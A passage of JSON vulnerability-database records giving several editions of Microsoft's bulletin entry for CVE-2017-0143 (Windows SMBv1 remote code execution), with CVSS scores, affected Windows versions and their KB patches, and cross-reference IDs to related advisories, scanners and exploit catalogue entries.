"Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T04:50:53", "differentElements": ["msAffectedSoftware"], "edition": 42}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-13T06:59:52", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB3210720", "KB3205401", "KB4013198", "KB4012216", "KB3205409", "KB3212646", "KB3213986", "KB4012213", "KBMS16-110, 3187754", "KB4012212", "KB4012598", "KB4012606", "KB4012217", "KB4013429", "KB4012214", "KB3177186", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T06:59:52", "differentElements": ["msAffectedSoftware"], "edition": 43}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-13T10:45:10", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB3205409", "KB3177186", "KB4012598", "KB4012216", "KB4012217", "KB4013429", "KB3210720", "KB4012212", "KB3205401", "KB4012213", "KB4012606", "KBMS16-110, 3187754", "KB4012215", "KB4013198", "KB3210721", "KB3212646", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T10:45:10", "differentElements": ["msAffectedSoftware"], "edition": 44}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows 